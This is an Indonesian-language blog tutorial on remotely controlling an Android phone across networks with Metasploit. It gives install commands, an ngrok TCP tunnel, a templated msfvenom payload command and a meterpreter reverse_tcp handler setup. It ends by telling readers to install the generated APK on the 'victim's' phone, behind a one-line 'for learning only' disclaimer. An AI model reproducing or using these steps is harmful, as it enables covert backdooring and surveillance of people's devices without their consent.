Apa itu Metasploit
Metasploit adalah tools peneteration testing yg sering digunakan untuk menguji kerentanan aplikasi berbasis web maupun seluler genggam seperti android atau iphone. pada tutorial kali ini saya ingin memberikan tutorial remote device beda jaringan dengan teknik port forwarding.
Tools ini memiliki kemampuan untuk membuat payload dan meterpreter listener nya sendiri untuk mempermudah metasploit beda jaringan, dengan kemampuan tersebut kita dapat melakukan remote device atau meyusupi sebuah perangkat dengan backdoor agar kita bisa mengendalikan perangkat ujicoba dari jarak jauh.
Installasi dan konfigurasi Metasploit untuk beda jaringan
Kita bisa menginstall memalui Packages manager yg tersedia di distribusi linux yg kalian gunakan, bukalah Terminal lalu ketikan bebera perintah sesuai dengan disto yg kalian pakai
- debian based system
$ sudo apt update && sudo apt install metasploit -y
$ sudo apt install openjdk-13-jdk-headless
$ sudo apt install zipalign
$ sudo apt install ngrok
- nightly installation
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
chmod 755 msfinstall && \
./msfinstall
Port forwading metasploit dengan ngrok
Pada kasus ini saya akan mencontohkan cara melakukan remote device pada perangkat android
pertama tama siapkan dulu port forwarding nya, pada kasus ini saya akan menggunakan ngrok agar host saya bisa di akses oleh publik dengan perintah
$ ngrok <connection> <port>
port yg kalian masukan bebas, dan karena disini saya akan menggunakan koneksi TCP maka perintah nya seperti dibawah ini
$ ngrok tcp 40141
baca juga artikel populer lainya
Jika kalian sudah berhasil maka tampilan ngrok kalian akan seperti itu, untuk host dan port ngrok biasanya berbeda beda setiap kali kalian menjalankanya
Pembuatan payload metasploit beda jaringan
untuk membuat payload kalian bisa menggunakan msfvenom yg tersedia di metasploit contohnya seperti ini
$ msfvenom -p <nama payload> lhost=<nama host> lport=<nomor port> -o <nama file output>
jika sudah seperti itu artinya saya sudah berhasil membuat payload dengan nama x.apk
sekarang tinggal kita buka meterpreter nya
Sesi Meterpreter
Buka terlebih dahulu tab baru di terminal kalian lalu copy paste baris perintah dibawah ini
$ msfconsole
use exploit /multi/handler
set payload/android/meterpreter/reverse_tcp
set lhost localhost
set lport 40141
exploit
jika sudah seperti ini kalian tinggal menginstall payload di hp korban dan menjalankanya.
Peringatan
Artikel ini hanyalah pelajaran semata, author tidak bertanggung jawab atas semua tindakan kriminal yg terjadi.
Selamat mecoba dan terimakasih sudah membaca artikel kami.